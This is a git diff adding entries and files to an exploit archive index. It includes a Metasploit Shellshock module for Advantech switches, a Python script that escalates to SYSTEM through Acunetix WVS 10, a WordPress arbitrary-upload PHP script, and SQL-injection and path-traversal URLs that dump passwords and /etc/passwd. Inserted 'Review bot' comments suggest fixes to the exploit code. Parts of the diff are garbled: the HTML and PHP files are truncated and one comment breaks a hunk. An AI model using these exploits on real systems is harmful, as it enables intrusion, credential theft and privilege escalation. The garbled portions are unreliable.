diff --git a/files.csv b/files.csv
index 77efef352..652ed1493 100755
--- a/files.csv
+++ b/files.csv
@@ -35103,5 +35103,14 @@ id,file,description,date,author,platform,type,port
 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0
 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
 38841,platforms/php/webapps/38841.txt,"Zenphoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
+38842,platforms/php/webapps/38842.txt,"Testa OTMS Multiple SQL Injection Vulnerabilities",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
+38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Include Vulnerability",2013-11-18,Esac,php,webapps,0
 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0
 38836,platforms/multiple/webapps/38836.txt,"ntop-ng <= 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
+38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery Vulnerability",2013-11-23,"Haider Mahmood",php,webapps,0
+38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0
+38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
+38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
+38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
+38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
+38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
diff --git a/platforms/cgi/remote/38849.rb b/platforms/cgi/remote/38849.rb
new file mode 100755
index 000000000..509d5479a
--- /dev/null
+++ b/platforms/cgi/remote/38849.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
+ 'Description' => %q{
+ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
+ handles external environment variables. This module targets the 'ping.sh' CGI
+ script, acessible through the Boa web server on Advantech switches. This module
+ was tested against firmware version 1322_D1.98.
+ },
+ 'Author' => 'hdm',
+ 'References' => [
+ ['CVE', '2014-6271'],
+ ['CWE', '94'],
+ ['OSVDB', '112004'],
+ ['EDB', '34765'],
+ ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
+ ['URL', 'https://access.redhat.com/articles/1200223'],
+ ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+ ],
+ 'Privileged' => false,
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00\x0A\x0D",
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'openssl generic'
+ }
+ },
+ 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
+ 'DefaultTarget' => 0,
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Dec 01 2015'
+ ))
+ register_options([
+ Opt::RPORT(80)
+ ], self.class)
+ end
+
+ #
+ # CVE-2014-6271
+ #
+ def cve_2014_6271(cmd)
+ %{() { :;}; $(#{cmd}) & }
+ end
+
+ #
+ # Check credentials
+ #
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/ping.sh'
+ )
+ if !res
+ vprint_error("#{peer} - No response from host")
+ return Exploit::CheckCode::Unknown
+ elsif res.headers['Server'] =~ /Boa\/(.*)/
+ vprint_status("#{peer} - Found Boa 
version #{$1}")
+ else
+ print_status("#{peer} - Target is not a Boa web server")
+ return Exploit::CheckCode::Safe
+ end
+
+ if res.body.to_s.index('127.0.0.1 ping statistics')
+ return Exploit::CheckCode::Detected
+ else
+ vprint_error("#{peer} - Target does not appear to be an Advantech switch")
+ return Expoit::CheckCode::Safe
+ end
+ end
+
+ #
+ # Exploit
+ #
+ def exploit
+ cmd = cve_2014_6271(payload.encoded)
+ vprint_status("#{peer} - Trying to run command '#{cmd}'")
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/ping.sh',
+ 'agent' => cmd
+ )
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/hardware/remote/38850.txt b/platforms/hardware/remote/38850.txt
new file mode 100755
index 000000000..ced8bc6ba
--- /dev/null
+++ b/platforms/hardware/remote/38850.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63880/info
+
+Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code.
+
+Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges.
+
+Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected.
+
+http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
\ No newline at end of file
diff --git a/platforms/multiple/remote/38845.txt b/platforms/multiple/remote/38845.txt
new file mode 100755
index 000000000..4fe915db2
--- /dev/null
+++ b/platforms/multiple/remote/38845.txt
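Review bot: `return Expoit::CheckCode::Safe` in the last `else` of `check` misspells the `Exploit` module, so a Boa host whose ping page lacks the expected string raises a NameError instead of reporting Safe; it should read `return Exploit::CheckCode::Safe`, matching the two earlier branches. In `exploit` the `res` assigned from `send_request_cgi` is never read, so the assignment can be dropped or the response status logged via `vprint_status`. The comment above `check` says `Check credentials` although the method only fingerprints the Server header and page body, and the description has the typo `acessible` for `accessible`.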
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63805/info
+
+SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary commands in the context of the affected system.
+
+SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected.
+
+curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1
\ No newline at end of file
diff --git a/platforms/multiple/remote/38846.txt b/platforms/multiple/remote/38846.txt
new file mode 100755
index 000000000..16a441b9f
--- /dev/null
+++ b/platforms/multiple/remote/38846.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/63814/info
+
+nginx is prone to a remote security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
+
+nginx 0.8.41 through 1.5.6 are vulnerable.
+
+The following example data is available:
+
+/file \0.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38842.txt b/platforms/php/webapps/38842.txt
new file mode 100755
index 000000000..76998f559
--- /dev/null
+++ b/platforms/php/webapps/38842.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/63773/info
+
+Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
+
+Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable.
+
+http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
+http://www.example.com/test/admin/index.php
\ No newline at end of file
diff --git a/platforms/php/webapps/38843.txt b/platforms/php/webapps/38843.txt
new file mode 100755
index 000000000..c1fee4a23
--- /dev/null
+++ b/platforms/php/webapps/38843.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63795/info
+
+TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
\ No newline at end of file
diff --git a/platforms/php/webapps/38844.html b/platforms/php/webapps/38844.html
new file mode 100755
index 000000000..cbe34cf32
--- /dev/null
+++ b/platforms/php/webapps/38844.html
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/63800/info
+
+The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected.
+
+
+ + + + + + + + + + +
Title +
URL +
+
diff --git a/platforms/php/webapps/38848.php b/platforms/php/webapps/38848.php new file mode 100755 index 000000000..5a45bbc3b --- /dev/null +++ b/platforms/php/webapps/38848.php @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/63836/info + +The Suco themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +"@$uploadfile")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; +?> diff --git a/platforms/windows/local/38847.py b/platforms/windows/local/38847.py new file mode 100755 index 000000000..9410dd2e4 --- /dev/null +++ b/platforms/windows/local/38847.py 
@@ -0,0 +1,162 @@
+'''
+========================================================================
+Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
+
+CVE: CVE-2015-4027
+Author: (me) Daniele Linguaglossa
+Affected Product: Acunetix WVS 10
+Exploit: Local privilege escalation
+Vendor: Acunetix ltd
+Remote: No
+Version: 10
+=========================================================================
+A local privilege escalation exists in Acunetix WVS 10, it allow
+a local user (even guest) to gain same privilege as System user.
+
+With default Acunetix installation, a service called "AcuWVSSchedulerv10"
+will be installed, this service run as local system user.
+
+AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
+it expose some API to interact via a web server usually localhost:8183.
+
+API:
+
+/listScan
+/addScan <== vulnerable one
+/deleteScan
+etc...
+
+When a user schedule a scan API "addScan" will be called as following
+
+-------------------------------------------------------------------------------
+POST /api/addScan HTTP/1.1
+Host: localhost:8183
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/json; charset=UTF-8
+RequestValidated: true
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost:8183/
+Content-Length: 452
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+
+{
+ "scanType": "scan",
+ "targetList": "",
+ "target": ["http://.target.it"],
+ "recurse": "-1",
+ "date": "12/2/2015",
+ "dayOfWeek": "1",
+ "dayOfMonth": "1",
+ "time": "12:21",
+ "deleteAfterCompletion": "False",
+ "params": {
+ "profile": "Default",
+ "loginSeq": "",
+ "settings": "Default",
+ "scanningmode": "heuristic",
+ "excludedhours": "",
+ "savetodatabase": "True",
+ "savelogs": "False",
+ "generatereport": "False",
+ 
"reportformat": "PDF",
+ "reporttemplate": "WVSAffectedItemsReport.rep",
+ "emailaddress": ""
+ }
+}
+------------------------------------------------------------------------------
+
+The first thing i noticed was the reporttemplate, this was used to create report
+when scanning ends, so it means an external file wich we can control will be then
+used by System! this would be interesting enough but i never look deep into.
+Instead i noticed something even worst, filename was used as argument to wvs.exe
+called with system privilege!
+
+By looking at how Acunetix handled reporttemplate argument i figured out that was
+possibile to inject custom arguments within reporttemplate, now this is where
+Acunetix help us :D in fact wvs was provided with an interesting argument it was
+/Run as reference says:
+
+https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
+
+Run a command line command during the crawl.
+Syntax: /Run [command]
+
+Example: /Run curl http://example.com/dir1/
+
+Wow that's really nice, so in order to execute a command we must insert a fake
+Crawl followed by a Run command so reporttemplate become:
+
+"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
+
+it worked cmd runned as System!
+==================================================================================
+
+Now let's pwn this!
+
+escalation.py
+'''
+
+import httplib
+import json
+from datetime import datetime
+import sys
+from time import gmtime, strftime
+
+
+COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
+ACUHOST = '127.0.0.1'
+ACUPORT = 8183
+ACUHEADERS = {
+ "Content-Type": "application/json; charset=UTF-8",
+ "X-Requested-With": "XMLHttpRequest",
+ "Accept": "application/json, text/javascript, */*; q=0.01",
+ "RequestValidated": "true"
+ }
+ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
+ACUDATA = {"scanType":"scan",
+ "targetList":"",
+ "target":["http://"+"A"*2048],
+ "recurse":"-1",
+ "date":strftime("%m/%d/%Y", gmtime()),
+ "dayOfWeek":"1",
+ "dayOfMonth":"1",
+ "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
+ "deleteAfterCompletion":"False",
+ "params":{"profile":"Default",
+ "loginSeq":"",
+ "settings":"Default",
+ "scanningmode":"heuristic",
+ "excludedhours":"",
+ "savetodatabase":"True",
+ "savelogs":"False",
+ "generatereport":"False",
+ "reportformat":"PDF",
+ "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
+ "emailaddress":""}
+ }
+
+def sendExploit():
+ conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
+ conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
+ resp = conn.getresponse()
+ return "%s %s" % (resp.status, resp.reason)
+
+print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
+print "[+] Command : %s will be executed as SYSTEM" % COMMAND
+print "[+] Sending exploit..."
+print "[+] Result: "+sendExploit()
+print "[+] Done!"
+
+'''
+============================================================================
+
+I hope this write-up was funny enough anyway i really would like to thank
+Acunetix product manager N.S. for the really fast answer and bug mitigation,
+right now a patch exists so hurry up download it now.
+============================================================================
+'''
\ No newline at end of file
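Review bot: The header writeup's example `"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"` spells the switch `/Craw`, while `ACUEXPLOIT` in the code uses `/Crawl`; the header should match the code so a reader checking scheduler logs or the vendor's CLI reference against the writeup is not sent looking for a flag that does not exist. `sendExploit` opens an `HTTPConnection` and never releases it; add `conn.close()` after `conn.getresponse()` (or put the request in a `try`/`finally`) so the socket does not linger until interpreter exit. The script is Python 2 only (`httplib`, `print` statements, `json.dumps` result passed as a `str` body) and the docstring header never says so; a line such as `Requires: Python 2` beside `Version: 10` would document that. The vendor-patch remark at the bottom is the most useful defender fact in the file and would be better placed in the header block next to the CVE line.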